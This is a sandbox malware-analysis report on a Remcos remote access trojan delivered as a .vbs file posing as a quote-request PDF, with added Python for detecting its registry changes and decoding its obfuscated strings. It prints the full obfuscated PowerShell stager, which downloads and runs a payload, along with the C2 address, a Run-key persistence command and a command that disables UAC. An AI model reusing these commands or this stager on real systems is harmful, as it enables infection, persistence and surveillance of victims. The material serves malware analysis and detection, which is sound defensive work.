Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    14/11/2024, 13:23 UTC

General

  • Target

    NTU 報價請求項目 FMD2024UOS·pdf.vbs

  • Size

    15KB

  • MD5

    7a8593917a881f736dae40fd3e739aa9

  • SHA1

    86f696ac97647bac9ef92b24e0818a97a70aee53

  • SHA256

    424d1b064b6e0a04e251193013187b35a779473df7411dcc285dc1284cf618d7

  • SHA512

    66ee428b08ac48a8550eeec67d3f41540dfb792e24408bb84a08888c69468dec834d0cff167cb62790f14277d35d173f239ee59b4af1c4fddd6b29b6169ed132

  • SSDEEP

    192:qzb9JpgciToUkIWTErzlS8HIYVFlXQNE7VrMPQ2cV3766aT0VA:SbLuXTiTErZSCH3gNEmyPVA

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-4EN793

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software that is sold commercially and widely abused as a remote access trojan.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, most likely for geofencing.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs a command through powershell.exe.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.

  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
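
The "UAC bypass" and "Adds Run key to start application" signatures above are produced by two reg.exe invocations that appear in the process tree below: one writes a REG_EXPAND_SZ value named "Startup key" under HKCU\...\Run whose data starts with an environment variable and pulls its script body out of another registry value with `gp`, the other sets EnableLUA to 0. The following Python is an added example written for this page, not tria.ge output: it parses `REG ADD` command lines the way a process-creation detection would and flags those two patterns. The two suspicious lines are copied from the process tree; the benign lines, the finding names and all function names are my own constructions.

```python
"""Triage of reg.exe ADD command lines for Run-key persistence and UAC
tampering. Added example for this page; not part of the sandbox output."""
import re
from typing import Optional

# Windows command-line tokenizer: a double-quoted run or a bare word.
_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')

_RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.I)
_SYSTEM_POLICY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Policies\\System$", re.I)
# PowerShell reading its payload out of another registry value (gp / Get-ItemProperty on HKCU:/HKLM:)
_REG_PAYLOAD_RE = re.compile(r"\b(gp|Get-ItemProperty)\b.*\bHK(CU|LM):", re.I)


def tokenize(cmdline: str) -> list[str]:
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN_RE.finditer(cmdline)]


def parse_reg_add(cmdline: str) -> Optional[dict]:
    """Return key/value/type/data for a `reg.exe ADD` invocation, else None.
    Works whether the line is `REG ADD ...`, a full path to reg.exe, or a
    `cmd.exe /c REG ADD ...` wrapper, because it keys off the ADD token."""
    toks = tokenize(cmdline)
    upper = [t.upper() for t in toks]
    if "ADD" not in upper or upper.index("ADD") + 1 >= len(toks):
        return None
    i = upper.index("ADD")
    rec = {"key": toks[i + 1].rstrip("\\"), "value": None, "type": None, "data": None}
    names = {"/V": "value", "/T": "type", "/D": "data"}
    j = i + 2
    while j < len(toks):
        if upper[j] in names and j + 1 < len(toks):
            rec[names[upper[j]]] = toks[j + 1]
            j += 2
        else:
            j += 1          # /f, /reg:32 and anything else we do not model
    return rec


def triage(cmdline: str) -> list[str]:
    """Return the list of findings for one command line (empty if benign)."""
    rec = parse_reg_add(cmdline)
    if rec is None:
        return []
    findings = []
    data = rec["data"] or ""
    if _RUN_KEY_RE.search(rec["key"]):
        findings.append("run-key-write")
        # REG_EXPAND_SZ lets the value begin with %VAR%, so the interpreter
        # name lives in an environment variable instead of in the value.
        if (rec["type"] or "").upper() == "REG_EXPAND_SZ" and re.match(r"%\w+%", data):
            findings.append("env-var-hidden-command")
        if _REG_PAYLOAD_RE.search(data):
            findings.append("registry-stored-payload")
    if (_SYSTEM_POLICY_RE.search(rec["key"])
            and (rec["value"] or "").lower() == "enablelua"
            and data.strip().lower() in ("0", "0x0")):
        findings.append("uac-disabled")
    return findings


SAMPLES = {
    # Copied from the process tree (PID 3836 and PID 892).
    "run_key": r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stephanurus% -windowstyle 1 $Optagelseskravets=(gp -Path 'HKCU:\Software\Upholstering\').Playscript;%Stephanurus% ($Optagelseskravets)"''',
    "enable_lua": r"C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    # Constructed benign lines for comparison.
    "benign_run": r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Program Files\Example\updater.exe --quiet" /f',
    "benign_other": r"REG ADD HKCU\Software\Example\App /v Theme /t REG_SZ /d dark /f",
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(f"{name:13} {triage(line)}")
```

A plain Run-key write on its own is only logged ("run-key-write"), since installers do that legitimately; the combination with an environment-variable-hidden interpreter and a registry-resident script body is what separates this sample's persistence from the constructed benign line.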

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NTU 報價請求項目 FMD2024UOS·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#agamemnon Rentekoder Hypaton Sumpegnenes #>;$Decursion='Brancher';<#Haploses Lecanine Phorrhea Xylomancy #>; function Feltprovsts($Whitethorn93){If ($host.DebuggerEnabled) {$merginae++;}$Arrestants=$Zoea+$Whitethorn93.'Length' - $merginae; for ( $Valgteknisk=4;$Valgteknisk -lt $Arrestants;$Valgteknisk+=5){$Sengekanten132=$Valgteknisk;$Fremtidsmulighedernes185+=$Whitethorn93[$Valgteknisk];}$Fremtidsmulighedernes185;}function Bstrup($Centrifugalpumpe){ & ($Lotuses) ($Centrifugalpumpe);}$kisra=Feltprovsts 'AdmoM UlkoSkilzVeheiO.enlblanlConcaEbcd/Tele ';$Forestful=Feltprovsts 'BenzTSpralPosisSugg1 Hyl2Vurd ';$Anetavlerne=' nex[ AnuNDommE rooTPict. umS.ingeE sprM rav rdi Polc onrEDiskpIndbOCrioINonmn ImbtFlorm He A nsuNSonaARoamgTer,ElapiRAbri]Hapl:Perv:FalsSKonteKaldCAlteU Ba.rUn aiKvgptK tcYAfstpModsR NumoHe,dt elo agtCUnadoEarwlForu=W ol$A.etFAndeOQuarR coleBogsSAmphTChefF M rUO.ziLKako ';$kisra+=Feltprovsts 'Sk l5 Afs. Reg0Awhe Ulm,(zelaW KuliEskanFor.dShi oBanewFodbsSego ForeNAutoT,ail Fali1 Udk0Kokk.S,ip0Sp.r; Sub Ru.nW.eltiAri.nHelt6sf,r4Sign;Fo,s Commx cyt6Refu4Epan; Si Pho r anvGain: K.l1Pejs3Musi1Poco.lav 0Slbe)Appr Sub GJordeElemcTanakSupeoShlu/Prog2Diab0had 1Bi e0Ansl0Udl,1 A s0Char1Peas TjrF.remiDemor rhveUnprfD.yloCactxCa p/U pr1Bi d3Hydr1Offe.Supp0M ul ';$Polar=Feltprovsts 'CockUDagbsSagiePantRForr- KonAGrusgtamaEAgl.nK,ltTOvis ';$Misbelieving=Feltprovsts 'Sch hDatatTramtMisspB.res f,e: K t/Tril/.movdTaagrBkkei KirvSubsetvan. 
TingTrsko nano OvegTryglChrye No .PortcFo so E.om ub/Po puKimbc All?P unequeexTracpUdkro AutrPreit ,ea=Eat.d B.loB,llwSc onSubclAnkeohejsaP osdAdel&SlaniTidsd Hin=Nonz1Jarrv Quil SmaiTesknPleoaSi twBuesC P rC,ageD UnmdGrecnZen Caffr8A.opGRkenaUpr rfarmsBar rUnf,IPran_ Ek ERep oInsaya toHWale1 ManNHemiC carS Ove5Fuml8 Un,C UncwBr e ';$Bevilliget=Feltprovsts 'Auto>Sabb ';$Lotuses=Feltprovsts 'TricI herEFingXDire ';$Valgtekniskmpinge='Slverglderne';$Maltsters='\Inflicts.Kol';Bstrup (Feltprovsts ' Mi $B.kmg usLNephO ffebForpaViaml upe: DesS TyvtallertherASyllp ortPPer.eKultTGuds=Tryk$tallEggehN Sgev Str: M sAVisiPHderpDu eDR,anAHatttPergaGard+ til$SortmdumbaBekol Ci.TByggsMunitSaksePinar P asmega ');Bstrup (Feltprovsts 'Elev$ HstGSameL GreoD.libBarba UdlL Sph:j dgr,rokaVedhALineKTurnORegnsBygnTModej FraeRhinrStreNBolv=Kitt$PkwyM.atuIm.weS Bl,bOvere B wL Fo iSkr e BikvStvsISkranDomsgunde.synsS mgrp yrlAgnoI Tott S k(Mowl$GaibBBlomE C uvAt.oIUndeL FryLBaudIO ttgAf,oeUberTStr ) Cat ');Bstrup (Feltprovsts $Anetavlerne);$Misbelieving=$Raakostjern[0];$Cynoxylon9=(Feltprovsts 'Dukk$Un oGSid LRektO Pe.B yroASav,l lus:BodeCZamboSparr avrValuA.nvosthadICos oChalnNagk1Cont2Him,1 O,p=ArchNGange UniWSkil-SmaaOIcelBA miJPy aeRokkCPartTJa,u Gup.SE teYEwassMatrTNordE AnamPoli. 
OppnKorneTndct Non.E lewPersE DecBFeriCSul,lKrici,ompeI,jiNRiddtanti ');Bstrup ($Cynoxylon9);Bstrup (Feltprovsts 'Bigr$Un oC,atuoTilbrOverrIonia NonsIncoi ImmoDiscnHal,1Fors2 Isf1.ame.Pen HT.roe CoaaUnfidMoste nker la,sCloc[ ,ng$CeruPAlveoD vilStr aSpdbr Ext]flas=Cuff$ GrokSo.riHaemsMockrSperaTal ');$Gnomic=Feltprovsts ' opv$ArtiC .ipoKa.irChibr igtaSskes iltiGratoSmrrnMona1 sup2Comm1F tt.Ge.mDPolyo tilw st n StnlSpgeoBelia Sv dSte FDogbiB hol,fgaeSkyl(Unex$ DuaMG ssi Hyps.igsbSahaePrimlRabaiKoffeUnm v.ncaiRessn alkg ,tj,Phar$.aksKT knn Sexi,hesrVangkIndveNonprDes iGamoeBic rolie) Tha ';$Knirkerier=$Strappet;Bstrup (Feltprovsts ' P i$F.legSbekLSl poLeprBskemaUn clUnst:til b TitL nopvGlamr ForeT.rpd skre For=Imag( ngsTHemoEGameSLo,qT Fly-Vk tpAppra CacT TyrHUnse Ro $ aviK PenNSlynIUngiRHos,KBra E AutRElekipup.E Trar Lo,)Diat ');while (!$Blvrede) {Bstrup (Feltprovsts ' No $DerhgTyggl alsoKrepb Ga aRaptlUdlu:MidsAWartb U fjN,neeAf.icParat andn Bo.eDigts RhesOc.a=Fluo$abtutacinrTrenuUnsleDrug ') ;Bstrup $Gnomic;Bstrup (Feltprovsts ' rouSJagttU,faAI drRBractLuna-CoucS K flBorgEnaphESupePNavl Use4Rezo ');Bstrup (Feltprovsts 'Cop $ UndGFarvLPat O Pu B,ulpaWorsL dre:Sch.b B alMurivK.rorStraeGaleD UndEAkac=Pret(Sk ttTjleeCe,bs EsttA,en- O ePBlomaSt dTknivHP.em Ord$Myelk F sNDunkiSnigr.ormk BrdEAnteRTimeiFodleThorR Kru),ini ') ;Bstrup (Feltprovsts ' Lur$flskGligeLFo,dO TymBThyrAGrunLAcce: putcPropoGor EI kbnMystzS neySolfm T nAJespTKberI FuncRoug= Fi $Snu GPatrLGldeoObjeb AntANegoLSele: UnpR peruPrveSPleue ellRGlacN Bree Kap+Ahea+ S,r% Kvl$u,orRVeinAT.ltASmokK,vioOPampsBjrgtRe.eJTerrEAnpaRD.scNReor.PlesCMegroroc USk snRystt Klu ') ;$Misbelieving=$Raakostjern[$Coenzymatic];}$Sympathique=315454;$Rhatanies=31106;Bstrup (Feltprovsts ' ugl$ SubgdlvyLCameo Un,bKnudaFjorLChef:MellkSmedy Ya,s Snut MonkUne lA phIMonomSmdeaMyose Mart m s riv=Bear d rigSoveeb dgtPres-RehnCHystoT arnS urTNongELiseNUdk,t ele Ineb$RugkKOxyaN Lsei Mo rPortKIso,E F.nrPhociAntiEUn.lr ,it ');Bstrup 
(Feltprovsts 'Brsr$ Forg estlKostoI dsbInfiaprocl,art: IradMilie blid FejiJordkCh na AdetSik,iColuo ThenEucgs GraeSyerk Brns.teleRaadmSamspDrejlCo.raS nor edaeCigardialnElekeAssesV nv Refu=Allo Mill[vrleSMi,iyUnlisIndatTr.pe Svim K s.OeilCKalkoSuggnA.stvHeaveTag rVaretSina] Ene: ro:Ko.mF Indr oxpoShotmForaB nda vrssa ieSk.t6S ri4Hg,pSov rtIdiorBookiOchfnOut gTriv(Rebr$Ci iKHypey aftsdiskt .ackEleklUdtri mkkmSulka Supe ,ectTorb)Enef ');Bstrup (Feltprovsts 'Vurd$SkivGFgtnL copOPre BsexoAOrculMa,d:DesoVVitiI nsuc MinEr weL .coIsta KskeeEGe,z Impu=.ext regg[Antis snYMuttsPo eTNymaeGaapM iru.TuritPoole lnsxsyslt ong.Kbe e NewnPrelCKoraO TraD ReciU stN Gc Gblte]Kern:Tote: Vsea.ncosB whCUnoiiBenwiCirc. Mi GMandeRdhat afbsBoucT,rapRSa vit aaNUdleGByeg(,uto$ S ld komeC,amDOverIOchoK kriATrocT nhIEnhaOPeriNFlansskrue IarKRdbrsFe tECo.eMi teptrapL T.oARungrDataeLabbrDropN PneeSupesProd)Reco ');Bstrup (Feltprovsts 'Red.$MetrgSvu lTeglOStatbunc.a LaslB,rd: bedpP etoQuadt ChoeK.rasRegit quaA efrTRec E Mis=Frer$UnduVKargITvisC TveE linl ArbIM ndKKlasE lf. .crSFoulUEm,rbUn,eStoaktBeguRstiniTurrnBor GBaro( ith$Begys ,xpYMar,MSoegPF.rsAKonttStavHMumliAgilq Kemu IndESm,s, ,il$ M,trWageH ,taaSlovtb,bbaCatiN ildiEromEGa.oSUnu )Cupo ');Bstrup $Potestate;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2892
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#agamemnon Rentekoder Hypaton Sumpegnenes #>;$Decursion='Brancher';<#Haploses Lecanine Phorrhea Xylomancy #>; function Feltprovsts($Whitethorn93){If ($host.DebuggerEnabled) {$merginae++;}$Arrestants=$Zoea+$Whitethorn93.'Length' - $merginae; for ( $Valgteknisk=4;$Valgteknisk -lt $Arrestants;$Valgteknisk+=5){$Sengekanten132=$Valgteknisk;$Fremtidsmulighedernes185+=$Whitethorn93[$Valgteknisk];}$Fremtidsmulighedernes185;}function Bstrup($Centrifugalpumpe){ & ($Lotuses) ($Centrifugalpumpe);}$kisra=Feltprovsts 'AdmoM UlkoSkilzVeheiO.enlblanlConcaEbcd/Tele ';$Forestful=Feltprovsts 'BenzTSpralPosisSugg1 Hyl2Vurd ';$Anetavlerne=' nex[ AnuNDommE rooTPict. umS.ingeE sprM rav rdi Polc onrEDiskpIndbOCrioINonmn ImbtFlorm He A nsuNSonaARoamgTer,ElapiRAbri]Hapl:Perv:FalsSKonteKaldCAlteU Ba.rUn aiKvgptK tcYAfstpModsR NumoHe,dt elo agtCUnadoEarwlForu=W ol$A.etFAndeOQuarR coleBogsSAmphTChefF M rUO.ziLKako ';$kisra+=Feltprovsts 'Sk l5 Afs. Reg0Awhe Ulm,(zelaW KuliEskanFor.dShi oBanewFodbsSego ForeNAutoT,ail Fali1 Udk0Kokk.S,ip0Sp.r; Sub Ru.nW.eltiAri.nHelt6sf,r4Sign;Fo,s Commx cyt6Refu4Epan; Si Pho r anvGain: K.l1Pejs3Musi1Poco.lav 0Slbe)Appr Sub GJordeElemcTanakSupeoShlu/Prog2Diab0had 1Bi e0Ansl0Udl,1 A s0Char1Peas TjrF.remiDemor rhveUnprfD.yloCactxCa p/U pr1Bi d3Hydr1Offe.Supp0M ul ';$Polar=Feltprovsts 'CockUDagbsSagiePantRForr- KonAGrusgtamaEAgl.nK,ltTOvis ';$Misbelieving=Feltprovsts 'Sch hDatatTramtMisspB.res f,e: K t/Tril/.movdTaagrBkkei KirvSubsetvan. 
TingTrsko nano OvegTryglChrye No .PortcFo so E.om ub/Po puKimbc All?P unequeexTracpUdkro AutrPreit ,ea=Eat.d B.loB,llwSc onSubclAnkeohejsaP osdAdel&SlaniTidsd Hin=Nonz1Jarrv Quil SmaiTesknPleoaSi twBuesC P rC,ageD UnmdGrecnZen Caffr8A.opGRkenaUpr rfarmsBar rUnf,IPran_ Ek ERep oInsaya toHWale1 ManNHemiC carS Ove5Fuml8 Un,C UncwBr e ';$Bevilliget=Feltprovsts 'Auto>Sabb ';$Lotuses=Feltprovsts 'TricI herEFingXDire ';$Valgtekniskmpinge='Slverglderne';$Maltsters='\Inflicts.Kol';Bstrup (Feltprovsts ' Mi $B.kmg usLNephO ffebForpaViaml upe: DesS TyvtallertherASyllp ortPPer.eKultTGuds=Tryk$tallEggehN Sgev Str: M sAVisiPHderpDu eDR,anAHatttPergaGard+ til$SortmdumbaBekol Ci.TByggsMunitSaksePinar P asmega ');Bstrup (Feltprovsts 'Elev$ HstGSameL GreoD.libBarba UdlL Sph:j dgr,rokaVedhALineKTurnORegnsBygnTModej FraeRhinrStreNBolv=Kitt$PkwyM.atuIm.weS Bl,bOvere B wL Fo iSkr e BikvStvsISkranDomsgunde.synsS mgrp yrlAgnoI Tott S k(Mowl$GaibBBlomE C uvAt.oIUndeL FryLBaudIO ttgAf,oeUberTStr ) Cat ');Bstrup (Feltprovsts $Anetavlerne);$Misbelieving=$Raakostjern[0];$Cynoxylon9=(Feltprovsts 'Dukk$Un oGSid LRektO Pe.B yroASav,l lus:BodeCZamboSparr avrValuA.nvosthadICos oChalnNagk1Cont2Him,1 O,p=ArchNGange UniWSkil-SmaaOIcelBA miJPy aeRokkCPartTJa,u Gup.SE teYEwassMatrTNordE AnamPoli. 
OppnKorneTndct Non.E lewPersE DecBFeriCSul,lKrici,ompeI,jiNRiddtanti ');Bstrup ($Cynoxylon9);Bstrup (Feltprovsts 'Bigr$Un oC,atuoTilbrOverrIonia NonsIncoi ImmoDiscnHal,1Fors2 Isf1.ame.Pen HT.roe CoaaUnfidMoste nker la,sCloc[ ,ng$CeruPAlveoD vilStr aSpdbr Ext]flas=Cuff$ GrokSo.riHaemsMockrSperaTal ');$Gnomic=Feltprovsts ' opv$ArtiC .ipoKa.irChibr igtaSskes iltiGratoSmrrnMona1 sup2Comm1F tt.Ge.mDPolyo tilw st n StnlSpgeoBelia Sv dSte FDogbiB hol,fgaeSkyl(Unex$ DuaMG ssi Hyps.igsbSahaePrimlRabaiKoffeUnm v.ncaiRessn alkg ,tj,Phar$.aksKT knn Sexi,hesrVangkIndveNonprDes iGamoeBic rolie) Tha ';$Knirkerier=$Strappet;Bstrup (Feltprovsts ' P i$F.legSbekLSl poLeprBskemaUn clUnst:til b TitL nopvGlamr ForeT.rpd skre For=Imag( ngsTHemoEGameSLo,qT Fly-Vk tpAppra CacT TyrHUnse Ro $ aviK PenNSlynIUngiRHos,KBra E AutRElekipup.E Trar Lo,)Diat ');while (!$Blvrede) {Bstrup (Feltprovsts ' No $DerhgTyggl alsoKrepb Ga aRaptlUdlu:MidsAWartb U fjN,neeAf.icParat andn Bo.eDigts RhesOc.a=Fluo$abtutacinrTrenuUnsleDrug ') ;Bstrup $Gnomic;Bstrup (Feltprovsts ' rouSJagttU,faAI drRBractLuna-CoucS K flBorgEnaphESupePNavl Use4Rezo ');Bstrup (Feltprovsts 'Cop $ UndGFarvLPat O Pu B,ulpaWorsL dre:Sch.b B alMurivK.rorStraeGaleD UndEAkac=Pret(Sk ttTjleeCe,bs EsttA,en- O ePBlomaSt dTknivHP.em Ord$Myelk F sNDunkiSnigr.ormk BrdEAnteRTimeiFodleThorR Kru),ini ') ;Bstrup (Feltprovsts ' Lur$flskGligeLFo,dO TymBThyrAGrunLAcce: putcPropoGor EI kbnMystzS neySolfm T nAJespTKberI FuncRoug= Fi $Snu GPatrLGldeoObjeb AntANegoLSele: UnpR peruPrveSPleue ellRGlacN Bree Kap+Ahea+ S,r% Kvl$u,orRVeinAT.ltASmokK,vioOPampsBjrgtRe.eJTerrEAnpaRD.scNReor.PlesCMegroroc USk snRystt Klu ') ;$Misbelieving=$Raakostjern[$Coenzymatic];}$Sympathique=315454;$Rhatanies=31106;Bstrup (Feltprovsts ' ugl$ SubgdlvyLCameo Un,bKnudaFjorLChef:MellkSmedy Ya,s Snut MonkUne lA phIMonomSmdeaMyose Mart m s riv=Bear d rigSoveeb dgtPres-RehnCHystoT arnS urTNongELiseNUdk,t ele Ineb$RugkKOxyaN Lsei Mo rPortKIso,E F.nrPhociAntiEUn.lr ,it ');Bstrup 
(Feltprovsts 'Brsr$ Forg estlKostoI dsbInfiaprocl,art: IradMilie blid FejiJordkCh na AdetSik,iColuo ThenEucgs GraeSyerk Brns.teleRaadmSamspDrejlCo.raS nor edaeCigardialnElekeAssesV nv Refu=Allo Mill[vrleSMi,iyUnlisIndatTr.pe Svim K s.OeilCKalkoSuggnA.stvHeaveTag rVaretSina] Ene: ro:Ko.mF Indr oxpoShotmForaB nda vrssa ieSk.t6S ri4Hg,pSov rtIdiorBookiOchfnOut gTriv(Rebr$Ci iKHypey aftsdiskt .ackEleklUdtri mkkmSulka Supe ,ectTorb)Enef ');Bstrup (Feltprovsts 'Vurd$SkivGFgtnL copOPre BsexoAOrculMa,d:DesoVVitiI nsuc MinEr weL .coIsta KskeeEGe,z Impu=.ext regg[Antis snYMuttsPo eTNymaeGaapM iru.TuritPoole lnsxsyslt ong.Kbe e NewnPrelCKoraO TraD ReciU stN Gc Gblte]Kern:Tote: Vsea.ncosB whCUnoiiBenwiCirc. Mi GMandeRdhat afbsBoucT,rapRSa vit aaNUdleGByeg(,uto$ S ld komeC,amDOverIOchoK kriATrocT nhIEnhaOPeriNFlansskrue IarKRdbrsFe tECo.eMi teptrapL T.oARungrDataeLabbrDropN PneeSupesProd)Reco ');Bstrup (Feltprovsts 'Red.$MetrgSvu lTeglOStatbunc.a LaslB,rd: bedpP etoQuadt ChoeK.rasRegit quaA efrTRec E Mis=Frer$UnduVKargITvisC TveE linl ArbIM ndKKlasE lf. .crSFoulUEm,rbUn,eStoaktBeguRstiniTurrnBor GBaro( ith$Begys ,xpYMar,MSoegPF.rsAKonttStavHMumliAgilq Kemu IndESm,s, ,il$ M,trWageH ,taaSlovtb,bbaCatiN ildiEromEGa.oSUnu )Cupo ');Bstrup $Potestate;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:624
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1620
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stephanurus% -windowstyle 1 $Optagelseskravets=(gp -Path 'HKCU:\Software\Upholstering\').Playscript;%Stephanurus% ($Optagelseskravets)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stephanurus% -windowstyle 1 $Optagelseskravets=(gp -Path 'HKCU:\Software\Upholstering\').Playscript;%Stephanurus% ($Optagelseskravets)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3836
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:892
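
Every string in the two powershell.exe command lines above is passed through `Feltprovsts`, which keeps one character out of every five (index 4, 9, 14, ...) and discards the four junk characters in front of it; `Bstrup` is `& $Lotuses`, and `$Lotuses` decodes to `IEX`, so each `Bstrup (Feltprovsts '...')` is an Invoke-Expression of the decoded text. The decoder below is an added example written for this page, not code from the sample or from tria.ge. `feltprovsts` reproduces the sample's function; `encode`, `decode_script` and `SAMPLE_SCRIPT` are my own constructions used to build and check test input. The four literals in `PAGE_LITERALS` are copied from the command lines above; longer literals such as the User-Agent fragments appear to have had runs of spaces collapsed by the HTML rendering of this page, so those must be taken from the original .vbs rather than copied from here.

```python
"""Decoder for the stride-based string obfuscation used by this sample's
PowerShell stager. Added example for this page; not tria.ge output."""
import re

STRIDE = 5   # chunk length used by the sample's Feltprovsts function
OFFSET = 4   # index of the real character inside each chunk


def feltprovsts(s: str, debugger_enabled: bool = False) -> str:
    """Reproduce the sample's decoder.

    The original subtracts a counter from the upper bound that is only
    incremented when $host.DebuggerEnabled is true, which drops the final
    character (normally the trailing space) when a debugger is attached."""
    bound = len(s) - (1 if debugger_enabled else 0)
    return "".join(s[i] for i in range(OFFSET, bound, STRIDE))


def encode(plain: str, junk: str = "xxxx") -> str:
    """Inverse of feltprovsts(); my own helper for building test input (the
    sample ships no encoder). Each real character gets four junk characters
    in front of it."""
    assert len(junk) == STRIDE - 1 and "'" not in junk
    return "".join(junk + ch for ch in plain)


# Feltprovsts '<single-quoted PowerShell literal>'. A decoded quote would have
# to appear as '' at two adjacent positions, which the stride layout cannot
# produce, so the literal is simply everything up to the next quote.
LITERAL_RE = re.compile(r"Feltprovsts\s+'([^']*)'")


def decode_script(script: str) -> list[str]:
    """Decode every Feltprovsts '...' literal in a stager command line,
    in order of appearance."""
    return [feltprovsts(m.group(1)) for m in LITERAL_RE.finditer(script)]


# Short literals copied verbatim from the command lines in the process tree.
PAGE_LITERALS = {
    "$Lotuses": "TricI herEFingXDire ",
    "$Forestful": "BenzTSpralPosisSugg1 Hyl2Vurd ",
    "$Polar": "CockUDagbsSagiePantRForr- KonAGrusgtamaEAgl.nK,ltTOvis ",
    "$Bevilliget": "Auto>Sabb ",
}


def decode_page_literals() -> dict[str, str]:
    return {name: feltprovsts(lit) for name, lit in PAGE_LITERALS.items()}


# Constructed stager fragment in the same shape as the real one. The decoded
# statements are hypothetical; they are not the sample's later stages.
SAMPLE_SCRIPT = (
    "$Lotuses=Feltprovsts '" + encode("IEX ") + "';"
    "Bstrup (Feltprovsts '" + encode("$wc=New-Object Net.WebClient") + "');"
    "Bstrup (Feltprovsts '" + encode("$wc.DownloadString($u)") + "');"
)

if __name__ == "__main__":
    for name, value in decode_page_literals().items():
        print(f"{name:12} -> {value!r}")
    print(decode_script(SAMPLE_SCRIPT))
```

Decoding the four page literals gives `IEX `, `Tls12 `, `UseR-AgEnT ` and `> `: the call operator target, the TLS version forced for the Google Drive download, the header name for the Firefox/131.0 User-Agent seen in the HTTP requests below, and the redirection operator. Each decoded string carries a trailing space because every literal ends in a chunk whose real character is a space.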

Network

  • Country: US
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88.deploy.static.akamaitechnologies.com
  • Country: US
    DNS
